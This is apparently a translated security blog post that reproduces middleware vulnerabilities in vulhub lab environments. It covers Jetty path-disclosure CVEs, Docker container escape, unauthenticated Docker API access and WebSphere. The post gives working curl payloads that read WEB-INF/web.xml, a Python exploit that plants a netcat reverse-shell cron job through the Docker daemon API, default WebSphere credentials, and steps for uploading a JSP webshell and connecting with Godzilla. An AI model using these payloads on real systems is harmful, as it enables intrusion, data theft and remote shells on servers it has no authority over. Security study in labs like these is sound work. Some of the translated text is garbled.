Directory
- Service Attack and Defense-Middleware Security &CVE Recurrence &K8s &Docker &Jetty &Websphere
-
- Middleware-K8s
- Middleware-Jetty
-
- Vulnerability recurrence
-
- CVE-2021-28164-Path information disclosure vulnerability
- CVE-2021-28169 Double decoding information leakage vulnerability
- CVE-2021-34429 Path information disclosure vulnerability
- Middleware-Docker
-
- Vulnerability recurrence
-
- Daemon API Unauthorized Access Vulnerability
- Middleware-WebSphere
-
- Vulnerability recurrence
-
- Deserialization CVE-2015-7450
- Weak password & amp; & amp;Background Getshell
- CVE-2020-4450
Service Attack and Defense-Middleware Security & amp;CVE Recurrence & amp;K8s & amp;Docker & amp;Jetty & amp;Websphere
Middleware and framework list:
IIS, Apache, Nginx, Tomcat, Docker, K8s, Weblogic, JBoos, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, Thinkphp, Spring, Flask, jQuery, etc.
Issues disclosed by middleware:
Middleware Security-IIS & Apache & Tomcat & Nginx Vulnerability Recurrence
Middleware security-Weblogic &Jenkins&GlassFish vulnerability recurrence
1. Middleware-K8s security
2. Middleware-Jetty security
3. Middleware-Docker security
4. Middleware-WebSphere security
Security testing of common middleware:
1. Improper configuration – parsing & weak passwords
2. Security mechanism-specific security vulnerabilities
3. Security mechanism-weak password blasting attack
4. Security application-framework specific security vulnerabilities
Middleware security testing process:
1. Determine middleware information – name & version & third party
2. Determine middleware problems-improper configuration & open vulnerabilities
3. Determine middleware utilization-weak password & EXP & framework vulnerabilities
Application service security testing process:
1. Determine service opening status – port scanning & combined applications, etc.
2. Determine the service type ownership-database & file transfer & communication, etc.
3. Determine service utilization methods – specific vulnerabilities & unauthorized & weak passwords, etc.
Middleware-K8s
Introduction: kubernetes explained in detail
Middleware-K8s:
Kubernetes, referred to as k8s, is an open source system open sourced by Google for automatically deploying, scaling and managing containerized applications. Within Bilibili, k8s has been widely and maturely used in managing production-level containers and application service deployment. Through k8s, you can orchestrate containers across multiple hosts, quickly expand containerized applications and their resources on demand, check application implementation status, service discovery and load balancing, etc.
K8s related security issues and vulnerability recurrence reference articles: k8s external attack surface summary_k8s vulnerabilities
Middleware-Jetty
introduce:
Elipse Jetty is an open source servlet container that provides a runtime environment for Java-based web containers. Jetty is an open source HTTP server and Servlet engine that provides a runtime environment for JSPs and Servlets. Compared with Tomcat, jetty is lighter, simpler and more flexible.
Security Question:
CVE-2021-28164-Path information disclosure vulnerability
CVE-2021-28169-Double decoding information leakage vulnerability
CVE-2021-34429-Path information disclosure vulnerability
Vulnerability Recurrence
CVE-2021-28164-Path Information Disclosure Vulnerability
Jetty version 9.4.37 introduces a more precise implementation of RFC3986 regarding URI decoding, as well as some new compliance modes to selectively allow support for certain URIs that may have ambiguous interpretations in Servlet-specified API method behavior. The default mode allows % encoding. Characters to exclude for URI normalization, the RFC is correct, but common servlet implementations don’t assume that.
The default compliance mode allows requests with contained or fragmented URIs to access protected resources in the WEB-INF directory. For example, the request can retrieve the web.xml file. This may reveal sensitive information about the web application implementation.
.../context/./WEB-INF/web.xmlThis bug has been fixed in version 9.4.39.
Shooting range: vulhub
Reference: CVE-2021-28164
Start the environment:
access:
payload: //Access sensitive files Web.xml /WEB-INF/web.xml //Used to bypass restrictions: ./ curl -v "http://192.168.100.134:8080/./WEB-INF/web.xml"
Or use burp to capture the packet, send a request or directly use the browser to make a direct url request
http://you-ip:8080/./WEB-INF/web.xml
CVE-2021-28169 Double decoding information leakage vulnerability
introduce:
Prior to versions 9.4.40, 10.0.2, 11.0.2, the and class in Jetty Servlet was affected by a double decoding error. If a developer uses these two classes manually, an attacker can use them to download arbitrary sensitive files in the WEB-INF directory.
ConcatServletWelcomeFilter
Shooting range: vulhub
Reference: CVE-2021-28169 Double decoding information leakage vulnerability
Start the environment:
access:
payload: //Access sensitive file Web.xml. /static?/WEB-INF/web.xml //Double URL encoding to bypass restrictions: W curl -v "http://your-ip:8080/static?/%57EB-INF/web.xml" curl -v "http://192.168.100.134:8080/static?/%57EB-INF/web.xml"
Use the browser to send a url request or use burp to capture the packet and modify the data packet. You can also send a request.
http://you-ip:8080/static?/WEB-INF/web.xml
CVE-2021-34429 Path Information Disclosure Vulnerability
introduce:
Eclipse Jetty is a Java Web server and Java Servlet container.
Jetty 9.4.40 fixes an ambiguous path information disclosure vulnerability CVE-2021-28164, of which CVE-2021-34429 is a variant and bypass.
There are 3 types of payloads that leak the following:
WEB-INF/web.xml
Unicode-based URL encoding:
/%u002e/WEB-INF/web.xmlThere is an error in
\0:./.There is an error in
\0:../a/b/..This vulnerability affects terminals 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
Shooting range: vulhub
Reference: CVE-2021-34429 Path Information Disclosure Vulnerability
Start the environment:
access:
payload: //Access sensitive file Web.xml. /WEB-INF/web.xml //Use payload to bypass restrictions: /%u002e/WEB-INF/web.xml curl -v "http://192.168.100.134:8080/%u002e/WEB-INF/web.xml"
Or directly use the browser URL request or use burp to capture the packet and send the request /%u002e/WEB-INF/web.xml
GET /%u002e/WEB-INF/web.xml HTTP/1.1 ...
http://192.168.100.134:8080/%u002e/WEB-INF/web.xml
In these two ways, the above two CVE vulnerabilities can also be successfully exploited.
Middleware-Docker
Introduction: Docker explained
Docker is an open source application container engine that allows developers to package their applications and dependencies into a portable image, and then publish it to any popular Linux or Windows operating system machine, which can also be virtualized. Containers completely use the sandbox mechanism and will not have any interfaces with each other.
The Docker container uses a sandbox mechanism and is a separate system. It is theoretically very safe. By using some means and executing POC or EXP, you can return to a high-privilege shell of the host and get the host's
Root authority allows you to directly operate host files. It escaped from the container, so we vividly call it a Docker escape vulnerability.
//Judge container 1. Container judgment: -Whether the .dockerenv file exists ls -alh/.dockerenv -Query the cgroup information of the system process: cat /proc/1/cgroup 2. Container escape vulnerability: privilege escalation - Caused by kernel vulnerability - Dirty COW (CVE-2016-5195) - Caused by Docker software design - CVE-2019-5736, CVE-2019-14271, CVE-2020-15257 - Caused by improper configuration - turning on privileged (privilege mode) + host directory mounting (file mounting), function (capabilities) mechanism, sock communication method-CVE-2016-5195 //Tool address: https://github.com/gebl/dirtycow-docker-vdso Upload to docker environment Enter the directory and execute make to compile. Execute the generated executable file
Security Question:
API Unauthorized Access Vulnerability
…
Vulnerability Recurrence
Daemon API Unauthorized Access Vulnerability
Shooting range: vulhub
Reference: Docker Daemon API Unauthorized Access Vulnerability
Start the environment:
Exploit:
//exp script, rebound shell
import docker
client = docker.DockerClient(base_url='http://you-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc attacker IP listening port -e /bin/sh' >> / tmp/etc/crontabs/rumilc" ''', remove=True, volumes={<!-- -->'/etc': {<!-- -->'bind': '/tmp/etc', 'mode': 'rw'}})
Execute the script:
python docker-api.py
Turn on monitoring:
nc -lvvp 8888
Just wait for the rebound.
Middleware-WebSphere
Introduction: Detailed explanation of webSphere
WebSphere is IBM's software platform. It encompasses the entire middleware infrastructure, such as servers, services, and tools, required to write, run, and monitor 24/7, industrial-strength, on-demand web applications and cross-platform, cross-product solutions. WebSphere provides reliable, flexible, and robust software.
WebSphere is a modular platform based on industry-supported open standards. Existing assets can be plugged into WebSphere through a trusted and durable interface, allowing you to continue to expand your environment. WebSphere runs on many platforms, including Intel, Linux, and z/OS.
Security Question:
Deserialization CVE-2015-7450
Weak password & amp; & amp;Background Getshell
CVE-2020-4450
…
Vulnerability Recurrence
Deserialization CVE-2015-7450
principle:
Apache Commons Collections (ACC) versions 3.2.1 and 4.0 fail to properly validate user input, and their InvokerTransformer class has security vulnerabilities when deserializing data from suspicious domains. This allows attackers to attach malicious code to user input and combine it. Use the readObject() method of different classes to execute Java functions or bytecode before final type checking (including calling Runtime.exec() to execute local OS commands).
recurrent:
The deserialization vulnerability occurs in SOAP communication port 8880, which can use https to send XML format data.
//Pull environment docker pull iscrosales/websphere7 //Open environment docker run -d -p 9060:9060 -p 9043:9043 -p 8880:8880 -p 9080:9080 iscrosales/websphere7
Wait for the environment to open before accessing it. If you access port 8880 and the following interface appears, there may be a Java deserialization vulnerability.
Exploit:
You can directly use the tool, one-click utilization of stud, RCE and upload operations, etc., just enter the url
After detection and execution:
Execute command (RCE):
whoami, current path pwd
Weak password & amp; & amp;Background Getshell
Weak password:
In versions 6.x to 7.0, you only need to enter admin as the user ID to log in to the backend, and you can log in to the backend without a password.
Access the 9096 port service:
//Login interface //http://you-ip:9060/ibm/console/unsecureLogon.jsp http://you-ip:9060/ibm/console //Default account password: websphere/websphere system/manager //Enter the background http://you-ip:9060/ibm/console/login.do
Weak password:
Successfully entered the background:
Background getshell:
1. Click WebSphere Enterprise Applications and click Install
2. Create a jsp Trojan file, compress it into a zip file, rename the zip file to a file with a war suffix, and upload it (upload the war package, click Next)
3. Fill in the context root, which is related to the URL you visit.
4. Save and access the shell (return to the WebSphere enterprise application, select the war package to start, and access the shell)
http://you-ip:9080/shell.jsp
http://you-ip:9080/1/shell.jspJust connect through Godzilla and run getshell.
The operation process is as follows:
1. Click WebSphere Enterprise Applications and click Install
2. Create a jsp Trojan file, compress it into a zip file, rename the zip file to a file with a war suffix, and upload it (upload the war package, click Next)
Upload, click Next:
3. Go to the next step to fill in the upper and lower roots; fill in the context root, which is related to the URL you visit.
Waiting for installation:
4. Save and access the shell (return to the WebSphere enterprise application, select the war package to start, and access the shell)
After the installation is complete, save the configuration:
After saving the main configuration, then return to the WebSphere enterprise application, select the war package to start, and access the shell
Select and click start:
success:
Access shell:
http://192.168.100.134:9080/shell.jsp
http://192.168.100.134:9080/1/shell.jsp
Next connect via Godzilla:
Successful connection:
Command execution:
For the detailed reproduction process, please refer to the article:
WebSphere vulnerability recurrence
CVE-2020-4450
For the principle and reproduction of the vulnerability, please refer to:
WebSphere remote code execution vulnerability CVE-2020-4450
CVE-2020-4450
For other middleware security issues and vulnerability recurrences, click the following link
Jump reference links are as follows:
Middleware Security-CVE Recurrence & IIS & Apache & Tomcat & Nginx Vulnerability Recurrence
Middleware Security-CVE Recurrence & Weblogic & Jenkins & GlassFish Vulnerability Recurrence